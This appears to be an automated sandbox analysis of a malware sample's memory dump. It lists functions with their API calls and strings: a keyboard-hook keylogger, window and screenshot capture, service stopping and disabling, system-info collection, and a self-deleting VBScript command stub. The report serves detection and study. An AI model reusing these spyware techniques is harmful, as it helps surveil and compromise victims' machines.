Opcode Fuzzy Hash: 840c13727cd2f055df9e3f45250c10aa30f0a59d5295323c5921bb3661981254
Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798

Uniqueness

Uniqueness Score: -1.00%

Function 0044F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40

GetLastError.KERNEL32 ref: 0044F369
__dosmaperr.LIBCMT ref: 0044F370
GetFileType.KERNEL32(00000000), ref: 0044F37C
GetLastError.KERNEL32 ref: 0044F386
__dosmaperr.LIBCMT ref: 0044F38F
CloseHandle.KERNEL32(00000000), ref: 0044F3AF
CloseHandle.KERNEL32(?), ref: 0044F4F9
GetLastError.KERNEL32 ref: 0044F52B
__dosmaperr.LIBCMT ref: 0044F532

Strings

H, xrefs: 0044F4B7

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004091F7
Sleep.KERNEL32(000001F4), ref: 00409202
GetForegroundWindow.USER32 ref: 00409208
GetWindowTextLengthW.USER32(00000000), ref: 00409211
GetWindowTextW.USER32 ref: 00409245
Sleep.KERNEL32(000003E8), ref: 00409313

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD

Strings

[ , xrefs: 004092AD
{ User has been idle for , xrefs: 00409345
], xrefs: 004092A7
minutes }, xrefs: 00409339

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
Opcode Fuzzy Hash: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
ExitProcess.KERNEL32 ref: 0040B64D

Strings

CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B5F0
""", 0, xrefs: 0040B56A
open, xrefs: 0040B63B
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B582
Temp, xrefs: 0040B523
.vbs, xrefs: 0040B4E8
exepath, xrefs: 0040B4BA

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
Opcode Fuzzy Hash: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 0043558A, Relevance: 16.6, APIs: 11, Instructions: 116COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
__dosmaperr.LIBCMT ref: 004355F6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
__dosmaperr.LIBCMT ref: 00435633
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
__dosmaperr.LIBCMT ref: 00435687
_free.LIBCMT ref: 00435693
_free.LIBCMT ref: 0043569A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
Opcode Fuzzy Hash: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004053ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040540C
GetMessageA.USER32 ref: 004054BC
TranslateMessage.USER32(?), ref: 004054CB
DispatchMessageA.USER32 ref: 004054D6
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

CloseChat, xrefs: 00405556
DisplayMessage, xrefs: 00405539
GetMessage, xrefs: 00405545

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 6f0a488ed170bcb52ef2918246923dd5e5a9e1f4d173e2a9cbd7c932fcf0f302
Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
Opcode Fuzzy Hash: 6f0a488ed170bcb52ef2918246923dd5e5a9e1f4d173e2a9cbd7c932fcf0f302
Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416472, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 004123B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004123DB
GetTickCount.KERNEL32 ref: 0041245B

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CountEventTick
String ID: 8E@
API String ID: 180926312-787191786
Opcode ID: 58bfabe4314d591ab1800f857d9d361a3137679ec485e75fd9a426b21b537fe0
Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
Opcode Fuzzy Hash: 58bfabe4314d591ab1800f857d9d361a3137679ec485e75fd9a426b21b537fe0
Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F

Uniqueness

Uniqueness Score: -1.00%

Function 00415938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041593D
GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
Sleep.KERNEL32(000003E8), ref: 00415A81
GetLocalTime.KERNEL32(?), ref: 00415A89
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A23
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A1E, 00415A3F, 00415AAD

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3280235481-3790400642
Opcode ID: ab062f08af728bb28cda05bd2555192150d35aff8c491bbd658ecb4172a7f536
Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
Opcode Fuzzy Hash: ab062f08af728bb28cda05bd2555192150d35aff8c491bbd658ecb4172a7f536
Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00413673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9

Sleep.KERNEL32(00000064), ref: 00413700
DeleteFileW.KERNEL32(00000000), ref: 00413734

Strings

temp, xrefs: 00413684
open, xrefs: 004136CE
\sysinfo.txt, xrefs: 0041367F
/t , xrefs: 004136B3
dxdiag, xrefs: 004136C9

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: cbb72141c50a427dd17f7d1e472087e9b5b996b109bcf1605c31d29da97a35f5
Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
Opcode Fuzzy Hash: cbb72141c50a427dd17f7d1e472087e9b5b996b109bcf1605c31d29da97a35f5
Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAF4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040EB01
int.LIBCPMT ref: 0040EB14

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040EB1D
std::_Facet_Register.LIBCPMT ref: 0040EB54
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EB5D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EB7B
std::exception::exception.LIBCMT ref: 0040EB8A

Strings

Y@, xrefs: 0040EB6A, 0040EB77, 0040EB7A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
String ID: Y@
API String ID: 2287991272-2491949953
Opcode ID: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction ID: ff1561f7ec47bfe26f0684d44a3055bc139d2b5ebdf4a0be2619b31cd2ef7e2e
Opcode Fuzzy Hash: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction Fuzzy Hash: 6411E232A00218ABCB14FBAAE80199EB778DF40764F10057BF90577291EB78AE0187DD

Uniqueness

Uniqueness Score: -1.00%

Function 00408892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
SetWindowsHookExA.USER32 ref: 004088BB
GetLastError.KERNEL32 ref: 004088C7

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetMessageA.USER32 ref: 00408915
TranslateMessage.USER32(?), ref: 00408924
DispatchMessageA.USER32 ref: 0040892F

Strings

[ERROR], xrefs: 004088ED
Keylogger initialization failure: error , xrefs: 004088DB

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: b62815908006d671b3ba6b01ffda31f0ef201653c0c6da435154935a0b38062a
Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
Opcode Fuzzy Hash: b62815908006d671b3ba6b01ffda31f0ef201653c0c6da435154935a0b38062a
Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00446532, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
Opcode Fuzzy Hash: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 0044E8D5, Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
__alloca_probe_16.LIBCMT ref: 0044EA3C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
__alloca_probe_16.LIBCMT ref: 0044EAE6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
__freea.LIBCMT ref: 0044EB55
__freea.LIBCMT ref: 0044EB61

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769

Uniqueness

Uniqueness Score: -1.00%

Function 0043E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

_memcmp.LIBVCRUNTIME ref: 0043EC78
_free.LIBCMT ref: 0043ECE9
_free.LIBCMT ref: 0043ED02
_free.LIBCMT ref: 0043ED34
_free.LIBCMT ref: 0043ED3D
_free.LIBCMT ref: 0043ED49

Strings

C, xrefs: 0043EB36

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
Opcode Fuzzy Hash: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004062D8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
CloseHandle.KERNEL32(00000000), ref: 004063B3
MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063EF
DeleteFileW.KERNEL32(00000000), ref: 004063FE

Strings

.part, xrefs: 004062FA

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part
API String ID: 820096542-3499674018
Opcode ID: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
Opcode Fuzzy Hash: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004165DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658

Strings

!]A, xrefs: 004165F5, 0041665A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: !]A
API String ID: 493672254-3355486170
Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563

Strings

6_A, xrefs: 00416526, 00416565

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: 6_A
API String ID: 221034970-3814682797
Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 004445EF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
__alloca_probe_16.LIBCMT ref: 00444681
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
__alloca_probe_16.LIBCMT ref: 00444766
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
__freea.LIBCMT ref: 004447D6

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

__freea.LIBCMT ref: 004447DF
__freea.LIBCMT ref: 00444804

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 00415288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
